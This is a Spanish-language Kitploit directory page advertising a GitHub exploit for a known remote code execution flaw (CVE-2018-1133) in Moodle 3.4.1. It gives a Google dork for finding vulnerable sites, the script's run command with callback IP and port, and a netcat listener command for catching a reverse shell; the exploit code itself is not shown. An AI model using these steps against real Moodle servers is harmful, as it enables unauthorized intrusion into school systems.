Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MoodleExploit — Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133 | Kitploit
Herramientas/GitHubGitHub/darrynten/moodleexploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdarrynten/moodleexploit

MoodleExploit

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Ver Repositorio
105hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Moodle

  • Título del Exploit: Moodle v3.4.1 RCE Exploit
  • Google Dork: inurl:"/course/jumpto.php?jump="
  • Fecha: 15 Marzo 2019
  • Autor del Exploit: Darryn Ten
  • Página del proveedor: https://moodle.org
  • Enlace del software: https://github.com/moodle/moodle/archive/v3.4.1.zip
  • Versión: 3.4.1 (Posiblemente < 3.5.0 e incluso 3.x)
  • Probado en: Linux con Moodle v3.4.1
  • CVE : CVE-2018-1133

Un usuario con el rol de profesor puede ejecutar código arbitrario.

Uso

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher

Asegúrate de estar ejecutando un listener netcat en el puerto especificado antes de ejecutar este script.

nc -lnvp 1010

Esto intentará abrir una shell inversa a la IP y puerto de escucha.

Notas

Este exploit se basa en información proporcionada por Robin Peraglie.

Lectura adicional: https://blog.ripstech.com/2018/moodle-remote-code-execution

Descargar herramienta